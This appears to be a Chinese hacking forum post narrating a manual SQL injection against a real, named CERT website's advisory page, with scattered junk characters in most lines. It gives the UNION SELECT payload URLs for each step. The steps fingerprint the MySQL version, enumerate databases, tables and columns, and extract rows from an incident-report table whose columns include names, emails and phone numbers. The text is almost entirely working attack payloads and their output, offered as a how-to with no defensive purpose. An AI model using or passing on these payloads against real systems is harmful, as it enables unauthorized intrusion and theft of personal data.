1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
5 P* W; Y% L* p' I8 b/ p3 A8 X" ~- k2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
2 p* @4 p( V' Z% @) o' r) ^http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
7 Z0 z& U4 K8 s: C3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
! J) k& G2 @2 r" @数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。$ u/ c3 ^1 w: {2 q% j
4.判断有没有写权限0 z/ Y0 N6 r8 a
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限6 \: i7 b+ ~% Y3 U* r
没办法,手动猜表啦0 l8 v; u b" F7 z0 k
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1( }/ j( h7 O& M/ C1 H/ d
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下1 N! c" K2 d: ]& K- y2 Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--3 u! h0 q: t. T& e! e! z3 S9 C; X
成功查出所有数据库,国外的黑客就是不一般。数据库如下:1 P7 B# p+ `3 y1 o; A1 W6 i( t
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
1 p F: p v: j6 K" g$ B6.爆表,爆的是twcert库
" c" C& S, q! D( J$ J6 _! N2 E% ghttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
3 v5 b( K1 f8 Q0 I5 a, ~1 k5 m) z爆出如下表
4 f# [% m' c) ^- R. a7 h' y, Mdownloadfile,irsys,newsdata,secrpt,secrpt_big5
, }# n9 i& [2 h: @/ S2 m7.爆列名,这次爆的是irsys表3 }% X2 ~ c+ x: \
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--2 f* I% a( A1 t1 K
爆出如下列
- b2 ]9 H' m: r7 m) z# U Cir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status3 X& y* j1 A6 E$ o2 { p' `
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
, \# s6 o% m) \. d5 Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
/ M) ?6 B# a' I9 ~% h' {- h返回是3,说明每个列里有3个地段
' o# r4 ^' m5 P9.爆字段内容
! R9 M, X8 l) ]9 g% |$ G6 chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
8 \2 ?5 Y" p; ]5 n0 _爆出name列的第一个字段的内容
7 t' X1 Q7 u; t5 E1 ]http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--; t. h, w+ j+ X/ x4 [; Y- G. B b
爆出name列的第二个字段的内容 |